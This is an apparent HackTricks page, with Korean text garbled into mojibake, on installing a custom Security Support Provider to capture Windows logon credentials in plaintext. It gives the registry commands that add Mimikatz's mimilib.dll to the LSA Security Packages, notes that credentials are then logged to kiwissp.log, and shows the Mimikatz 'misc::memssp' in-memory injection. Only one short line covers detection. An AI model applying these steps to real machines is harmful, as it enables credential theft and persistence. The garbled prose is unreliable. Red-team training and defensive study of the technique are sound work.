Custom SSP
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Custom SSP
SSP(๋ณด์ ์ง์ ๊ณต๊ธ์)๊ฐ ๋ฌด์์ธ์ง ์ฌ๊ธฐ์์ ์์๋ณด์ธ์.
์์ ์ SSP๋ฅผ ์์ฑํ์ฌ ๋ช
ํํ ํ
์คํธ๋ก ์๊ฒฉ ์ฆ๋ช
์ ์บก์ฒํ ์ ์์ต๋๋ค.
Mimilib
Mimikatz์์ ์ ๊ณตํ๋ mimilib.dll ๋ฐ์ด๋๋ฆฌ๋ฅผ ์ฌ์ฉํ ์ ์์ต๋๋ค. ์ด๊ฒ์ ๋ชจ๋ ์๊ฒฉ ์ฆ๋ช
์ ๋ช
ํํ ํ
์คํธ๋ก ํ์ผ์ ๊ธฐ๋กํฉ๋๋ค.
dll์ C:\Windows\System32\์ ๋ฐฐ์นํ์ธ์.
๊ธฐ์กด LSA ๋ณด์ ํจํค์ง ๋ชฉ๋ก์ ๊ฐ์ ธ์ต๋๋ค:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
mimilib.dll๋ฅผ ๋ณด์ ์ง์ ๊ณต๊ธ์ ๋ชฉ๋ก(๋ณด์ ํจํค์ง)์ ์ถ๊ฐํฉ๋๋ค:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
์ฌ๋ถํ
ํ ๋ชจ๋ ์๊ฒฉ ์ฆ๋ช
์ C:\Windows\System32\kiwissp.log์ ํ๋ฌธ์ผ๋ก ์ ์ฅ๋ฉ๋๋ค.
๋ฉ๋ชจ๋ฆฌ ๋ด
Mimikatz๋ฅผ ์ฌ์ฉํ์ฌ ๋ฉ๋ชจ๋ฆฌ์ ์ง์ ์ฃผ์ ํ ์๋ ์์ต๋๋ค(์ฝ๊ฐ ๋ถ์์ ํ๊ฑฐ๋ ์๋ํ์ง ์์ ์ ์์ต๋๋ค).
privilege::debug
misc::memssp
์ด๊ฒ์ ์ฌ๋ถํ ์ ์ ์ง๋์ง ์์ต๋๋ค.
์ํ
์ด๋ฒคํธ ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages์ ๊ฐ์ฌ ์์ฑ/๋ณ๊ฒฝ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


